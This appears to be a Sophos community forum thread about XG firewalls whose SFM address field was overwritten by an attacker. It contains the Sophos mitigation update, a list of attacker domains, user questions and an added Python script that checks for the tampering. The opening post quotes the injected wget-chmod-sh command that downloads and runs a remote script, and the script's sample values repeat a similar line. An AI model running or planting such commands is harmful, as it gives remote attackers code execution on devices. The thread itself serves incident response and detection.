
XG firewalls connected to SFM are no longer able to connect or synchronize to SFM. Notice the following change in the settings

Hello All,

Weird issue we noticed today: the XG firewalls connected to SFM were no longer able to connect or synchronize to SFM.

After looking at the settings on the affected XG firewalls, we noticed that in place of the SFM IP address was this parameter:

||cd /tmp/ && wget sophosfirewallupdate.com/.../Install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh|| 

After removing this parameter and pointing it to our SFM IP, we were able to get that firewall to synchronize and connect to SFM successfully.

What I want to know is what could have caused that setting to change. No one from our team has made this change. I believe SFM templates do not have the capability to push this setting.

This is very concerning and alarming, and I would like to know if anyone has any ideas or where to look. I already opened a case with Sophos and was on the phone with them for about 3 hours reviewing and grabbing logs. Thoughts on this! - Attached is a screenshot of one of the XG firewalls.

 



  • We just discovered this too and have opened a support case.

    After setting the value back to the IP of the SFM, it reverts to the invalid value when we try to push a rule out.

     

    It has probably been happening for a few weeks.

  • Hi  and  

    We sincerely regret any inconvenience this has caused. Sophos is investigating and will be updating this thread with more details as they unfold.

  • **Update 2020/04/25 01:00 Pacific
    Please visit this KBA for more information.
     
    **UPDATE 2020/04/23 21:00 Pacific
    Earlier today, some customers reported a discrepancy in the SFM server address field on their Firewalls. Sophos provided initial steps to mitigate the issue and this update provides additional recommendations as we continue to investigate the issue and corrective actions.
     
    The symptom suggests potential unauthorized access. The following mitigations have been confirmed to eliminate the issue while we automate a software-based remedy.
     
    1. The issue can only manifest itself on systems that have exposed the HTTPS admin services or the User Portal on the WAN interface. To prevent this issue, choose the “Administration” link on the left-hand navigation panel of the management console to get to the “Device Access” page, illustrated below, where customers must ensure that both Admin services and User Portal are deactivated on the WAN interface, as highlighted:



      Note: If you currently rely on WAN-based Admin services, we recommend you have configured one of the following BEFORE deactivating these services:

      Administering your Firewall via Sophos Central (recommended):
      https://community.sophos.com/kb/en-us/127461

      Administering your Firewall via Remote Access VPN:
      https://community.sophos.com/kb/en-us/133109

      Sophos Customer Support is available to assist you in completing the steps above as necessary.
      Please reach us at: https://secure2.sophos.com/en-us/support/open-a-support-case.aspx

    2. Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all of the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property, which will eliminate the unauthorized traffic):

      • sophostraining.org
      • sophosproductupdate.com
      • sophosenterprisecenter.com
      • sophoswarehouse.com
      • Ragnarokfromasgard.com
      • sophosfirewallupdate.com
        For assistance on adding these domains as DNS host entries, please refer to these instructions.

    3. Contact Sophos Support by phone or email to open a case. We will ensure you receive any future communications on this issue.

     

     Additional screenshots for reference:
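Two checks a practitioner would want to run after reading the update above and the opening post: does any firewall's SFM server-address setting contain the injected shell command instead of a hostname or IP, and have any internal hosts resolved the six domains listed in the update? The script below is an added example and is not Sophos's code or anything posted in this thread. The domain list is taken from the update; the DNS log format, the sample log lines, the example SFM address values and the heuristic used to flag a tampered setting are all constructed assumptions for illustration.

```python
"""Added example: IOC checks for the SFM-address tampering and the domains named in the update."""
import re
from typing import List, Optional, Tuple

# Domains listed in the 2020/04/23 Sophos update (not Sophos properties). Matched case-insensitively.
IOC_DOMAINS = {
    "sophostraining.org",
    "sophosproductupdate.com",
    "sophosenterprisecenter.com",
    "sophoswarehouse.com",
    "ragnarokfromasgard.com",
    "sophosfirewallupdate.com",
}

# Shell fragments that appeared in the injected SFM "server address" value (assumption: a
# legitimate value is a bare hostname or IPv4 literal and never contains these).
SHELL_MARKERS = ("||", "&&", "wget", "/tmp/")


def sfm_address_is_suspicious(value: str) -> bool:
    """True when an SFM server-address setting does not look like a plain hostname/IP."""
    v = value.strip()
    if any(marker in v for marker in SHELL_MARKERS):
        return True
    # Anything outside the hostname/IPv4 alphabet (spaces, slashes, pipes...) is suspicious.
    return re.fullmatch(r"[A-Za-z0-9.\-]+", v) is None


def matches_ioc(qname: str) -> Optional[str]:
    """Return the IOC domain that qname equals or is a subdomain of, else None."""
    name = qname.lower().rstrip(".")
    for domain in IOC_DOMAINS:
        if name == domain or name.endswith("." + domain):
            return domain
    return None


# Constructed log format (assumption): "<date> <time> <client-ip> query <qname>"
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<client>\d+\.\d+\.\d+\.\d+) query (?P<qname>\S+)")


def scan_dns_log(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, client, qname, ioc_domain) for every line whose query hits an IOC."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the constructed format
        ioc = matches_ioc(m["qname"])
        if ioc:
            hits.append((m["ts"], m["client"], m["qname"], ioc))
    return hits


# Constructed sample DNS log lines for a stand-alone run (not real data).
SAMPLE_DNS_LOG = [
    "2020-04-04 09:12:01 10.1.2.3 query sophosproductupdate.com",
    "2020-04-04 09:12:05 10.1.2.3 query www.example.com",
    "2020-04-22 17:40:12 10.1.2.77 query update.SophosFirewallUpdate.com",
    "2020-04-22 17:41:00 10.1.2.77 query sophos.com",
    "malformed line that the parser should ignore",
]

if __name__ == "__main__":
    # Constructed example values for the SFM server-address field.
    for candidate in ("10.0.0.5", "||cd /tmp/ && wget evil.example/x.sh -O /tmp/x.sh && sh /tmp/x.sh||"):
        print(f"SFM address {candidate!r}: suspicious={sfm_address_is_suspicious(candidate)}")
    for ts, client, qname, ioc in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{ts} {client} resolved {qname} (IOC: {ioc})")
```

The subdomain match (`endswith("." + domain)`) matters because the injected command fetched from a path under sophosfirewallupdate.com, and a resolver log may show host labels in front of the listed domain; requiring the leading dot avoids false positives on unrelated names that merely end in the same string. Feed the real resolver or proxy log into `scan_dns_log` after adjusting `LOG_RE` to its format.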

  • I was referred to this post by Sophos support due to the issue linked below:

    https://community.sophos.com/products/unified-threat-management/f/network-protection-firewall-nat-qos-ips/119975/advanced-threat-protection-triggering-on-sophosproductupdate-com

    A question they have yet to answer is why we are being asked to associate domains that Sophos does not own with an IP that also has unknown ownership. I was sent to this post without any clear explanation of why it should be followed. Can anyone here clarify why the DNS override above was proposed?

    Thanks,

    D.V.

  • I suspect we'll find out they hard coded some URL into their appliances or SFM and either didn't register them or stopped registering them (hangover from UTM?)

     

    Most of the domains were newly registered on 28th March, so someone either got lucky or found them and registered them.

     

    100% sure the IP is under the control of Sophos, which is why they are asking to redirect there so the update mechanism downloads an empty file.

  • Hello Marco,

    could you please explain to me how it is possible that the XG Firewall has obtained EAL4+ certification when it flows into it from all sides?!?

    I'm sorry but I really can't understand it. Perhaps only that obtaining this certification was very, very expensive ...
    I think you understand what I mean?

    Regards

    alda

  • I'd also like to ask why the only notification of this issue was posted to the Community forums and not e-mailed directly to partners and end users upon discovery. Not everyone watches these forums 24/7. This should not be the official place to release these notifications.

  • Also, do we have to worry about saved credentials for things like AD/LDAP servers? Can you please share a copy of x.sh so we can understand what actions were executed?

  • Hi AdamBasalyga,

    We will soon release more details of the attack and its payloads. Please follow our https://community.sophos.com/kb/en-us/135412 for further updates.

  • I look at this:

    Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property which will eliminate the unauthorized traffic):

    • sophostraining.org
    • sophosproductupdate.com
    • sophosenterprisecenter.com
    • sophoswarehouse.com
    • Ragnarokfromasgard.com
    • sophosfirewallupdate.com
      For assistance on adding these domains as DNS host entries, please refer to these instructions.

    And found that some of our desktops were communicating with some of these addresses as early as the 4th of April.

    Seems abnormal to me. Did XG leak from WAN to make it to our desktops??????

    Please a quick response.

    Paul Jr